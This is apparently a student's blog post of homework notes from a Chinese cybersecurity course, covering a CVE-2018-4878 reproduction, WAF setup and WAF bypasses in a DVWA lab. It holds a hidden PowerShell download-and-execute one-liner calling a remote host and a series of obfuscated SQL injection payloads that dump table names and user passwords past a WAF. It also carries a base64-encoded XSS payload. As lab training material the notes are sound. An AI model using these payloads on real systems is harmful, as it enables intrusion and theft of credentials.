11.30

网络安全C10-2024.11.30@所有人

作业:

  1. CVE-2018-4878漏洞复现

powershell -windowstyle hidden -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://10.0.0.164:80/magedu.ps1');test.ps1"

  1. 实现WAF安装与配置

3、WAF绕过SQL注入

(1)分别在无WAF和有WAF的情况下,利用SQLMap进行注入,对比注入结果的区别

无waf情况

有waf情况

  1. 有WAF的情况下,手工注入出DVWA数据库中的user和password

查看字段 order by 被过滤,且用#显示报错用--+

使用联合注入 1' regexp "%0A%23" /*!union %0a select*/ 1,2 --+

数据库-1' regexp "%0A%23" /*!11144union%20%0A select*/1,DAtaBase(%0A /*!11144*/)--+

用户

-1' regexp "%0A%23" /*!union%20%0A select*/ 1,user(%0A /*!11144*/)--+

,版本,

id=1' regexp "%0A%23" /*!union %0A select*/ 1,/*!11445version*/(%0A /*!11445*/) --+

获取全部表名

id=-1' /*!11445union*/ /*!--+/*%0aselect/*!1,*/ group_concat(/*!11445table_name*/) /*!from*/

/*!--+/*%0ainformation_schema./*!tables*/ /*!where*/ /*!11445table_schema*/='dvwa' --+

获取字段名

id=-1' /*!11445union*/ /*!--+/*%0aselect/*!1,*/ group_concat(/*!11445column_name*/) /*!from*/

/*!--+/*%0ainformation_schema./*!columns*/ /*!where*/ /*!11445table_name*/='users' and /*!11445database*/(%0a /*!11445*/)='dvwa' --+

读数据

?id=-1' /*!11445union*/ /*!--+/*%0aselect/*!user,*/password from users --+

4、WAF绕过XSS实验

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnbmkgaGFvIHNodWFpJyk8L3NjcmlwdD4="

预习:了解提权的概念

预习资料:https://blog.csdn.net/qq_38684504/article/details/91359951

posted @ 2024-12-11 23:15  雷子暑假结束  阅读(22)  评论(0)    收藏  举报